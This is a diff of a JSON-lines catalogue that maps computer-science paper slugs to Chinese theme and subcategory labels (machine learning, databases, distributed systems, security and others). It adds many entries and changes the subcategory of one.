+{"slug":"a-formal-semantics-of-c-with-openmp-parallelism-arxiv-2605-26527","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"a3c-2016","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"abadi-dpsgd-2016","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"acl2-2000","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"activation-patching","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 可解释性","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"adafactor-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"adam-2014","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"adam-2014","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"adamw-2017","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"adapton","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"aes-gcm-2003","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"aes","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"密码学","source":"category","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"afd-disagg-moe","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"afs-1988","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"agda-norell","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"agent-r1-2511","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} +{"slug":"agent-skill-protocol-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"agentic-proving-for-program-verification-arxiv-2605-23772","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"agentless","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI / 软件工程","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"agentrefine","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"agi-survey","area":"papers","theme":"其他","themeId":"other","subcategory":"AGI","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} +{"slug":"agora-autonomous-bug-detection-in-consensus-protocols-with-llm-agents-arxiv-2605","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"akamai-2002","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"akamai-2010","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"algol-60","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"align-2021","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"almgren-chriss-2001","area":"papers","theme":"其他","themeId":"other","subcategory":"量化金融","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"alpa-2022","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"alphago","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"强化学习 / AI","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"altgen","area":"papers","theme":"其他","themeId":"other","subcategory":"无障碍","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} +{"slug":"amaryllis-probabilistic-iris","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"amber-sigmod-2014","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"amdahl-law-1967","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"amoeba-1990","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"amp-arc-multi-proposer-protocol-with-bounded-inclusion-arxiv-2605-23677","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"ampere-architecture-2020","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"amplification-hell-2014","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"ance-2020","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} @@ -30,20 +43,27 @@ {"slug":"anserini-2017","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"anthropic-circuits","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 可解释性","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"anthropic-prompt-caching","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 工程","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"anticipatory-scheduler-2001","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"apex-policy-exploration","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"apollo-2014","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"apron-2009","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"argon2-2015","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"aries-1992","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"arrakis-2014","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"arrow-flight-sql-2026","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"art-2013","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"asterisk","area":"papers","theme":"通信","themeId":"communication","subcategory":"通信 / 开源 PBX","source":"category","confidence":"high","rawCategory":"通信"} {"slug":"astree","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"atlas-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"attention-sinks-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"attention","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"深度学习 / NLP","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"atzei-eth-attacks-2017","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"aurora-exascale-2024","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"aurora","area":"papers","theme":"数据库","themeId":"databases","subcategory":"数据库系统","source":"category","confidence":"high","rawCategory":"数据库"} {"slug":"autogen","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"automating-low-risk-code-review-at-meta-radar-arxiv-2605-30208","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} +{"slug":"automerge-json-crdt-2017","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} +{"slug":"av2-video-spec","area":"papers","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} {"slug":"avgustinov-codeql-2016","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"awodey-warren-2009","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"awq-2023","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} @@ -51,6 +71,9 @@ {"slug":"azure-storage-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"b-tree-1972","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"b4-2013","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"backdoor-xz-liblzma-2024","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"backstage-spotify-2020","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} +{"slug":"backus-fp-1978","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"badger","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储系统","source":"category","confidence":"high","rawCategory":"数据库"} {"slug":"baraff-witkin-1998-cloth","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"barrelfish-2009","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} @@ -73,9 +96,12 @@ {"slug":"bigbench-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"biggan-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"bigtable-2006","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"bijou64-varint","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"bitcoin","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统 / 密码学","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"bittorrent-2003","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"black-scholes-1973","area":"papers","theme":"其他","themeId":"other","subcategory":"量化金融","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"blackwell-architecture-2024","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"blast-altschul-1990","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"生物信息","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"blink-2020","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"blinn-1977","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"blip2-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} @@ -88,6 +114,7 @@ {"slug":"borg-omega-kube-2016","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"borg","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"bos-kyber-2018","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"bounded-priority-aware-locking-for-real-time-kernels-arxiv-2605-27620","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"bowe-halo-2019","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"bpr-2009","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"brakerski-bgv-2012","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} @@ -95,11 +122,15 @@ {"slug":"brewer-cap-2000","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"brill-moore-2000","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"brook-2004","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"brooks-no-silver-bullet-1986","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"btrfs-2013","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"bunz-bulletproofs-2018","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"burgess-2020-turing-rt","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"bvt-1999","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"bw-tree","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"byzantine-generals-1982","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"c-store-stonebraker-2005","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"cache-coherence-cxl3-2026","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"系统综合","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} {"slug":"cadar-klee-2008","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"caesar-rexford-2005","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"cakeml","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} @@ -112,9 +143,12 @@ {"slug":"cascades-1995","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"case-for-risc-1980","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"cassandra-2010","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"cassandra-eventual-tradeoff","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"catmull-1974-zbuffer","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"catmull-clark-1978","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"causal-abstraction","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 可解释性","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"cci-agent-scaffolding","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"ccopd-distillation","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"cell-be-2005","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"ceph-2006","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"cerf-kahn-1974","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} @@ -124,6 +158,7 @@ {"slug":"chain-replication-2004","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"chaitin-graph-coloring","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"chandy-lamport-1985","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"chaos-engineering-netflix-2016","area":"papers","theme":"其他","themeId":"other","subcategory":"工程文化","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"chapar-2016","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"chapter-llama-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"chat-univi-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} @@ -137,7 +172,9 @@ {"slug":"chronos-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"chubby","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"ci-effects","area":"papers","theme":"其他","themeId":"other","subcategory":"软件工程","source":"category","confidence":"high","rawCategory":"其他"} +{"slug":"ciechanowski-mechanical-watch","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"cimatti-nusmv-2002","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"ckks-homomorphic-2017","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"clark-1988","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"clarke-cegar-2003","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"clarke-emerson-1981","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} @@ -146,6 +183,8 @@ {"slug":"clearml","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"MLOps","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"clickhouse","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"category","confidence":"high","rawCategory":"数据库"} {"slug":"clip","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"多模态 / 计算机视觉","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"clove-object-level-cxl-memory-management-in-managed-runtimes-arxiv-2605-20370","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"coap-rfc7252","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"coca-2022","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"cockroachdb-2020","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"cocondenser-2021","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} @@ -154,6 +193,7 @@ {"slug":"codd-1979-extending","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"code-as-agent-harness","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"codellama-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"codemirror-6-architecture","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"codex-2021","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"codons-2004","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"coeffect-petricek","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} @@ -161,12 +201,18 @@ {"slug":"cohen-1985-hemicube","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"colbert-2020","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"colbert-v2","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"数据检索","source":"category","confidence":"high","rawCategory":"信息检索"} +{"slug":"cold-start-safety","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"LLM安全","source":"candidates.topic+category","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"columnar-storage-formats-2023","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"comer-1979-btree","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"compcert","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"compiler-errors","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言 / 编译器","source":"category","confidence":"high","rawCategory":"编程语言"} +{"slug":"compiler-perf-left-on-table","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"compose-future-theorems","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"定理证明","source":"slugOverrides","confidence":"high","rawCategory":"形式化方法"} +{"slug":"compositional-incoherence","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"consistency-models-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"consistent-hashing-1997","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"constitutional-ai","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 安全 / NLP","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"continual-pretrain-survey-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"cook-1984-distributed-ray-tracing","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"cook-1986-stochastic-sampling","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"cook-levin","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"计算理论","source":"category","confidence":"high","rawCategory":"编程语言"} @@ -187,6 +233,8 @@ {"slug":"crdt-shapiro-2011","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"crdt-sss-2011","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"croft-harper-1979","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"crossover-context-multi-agent","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"crowdstrike-bsod-2024","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"cryptoverif-2008","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"csp-hoare-1978","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"cstore-2005","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} @@ -201,9 +249,11 @@ 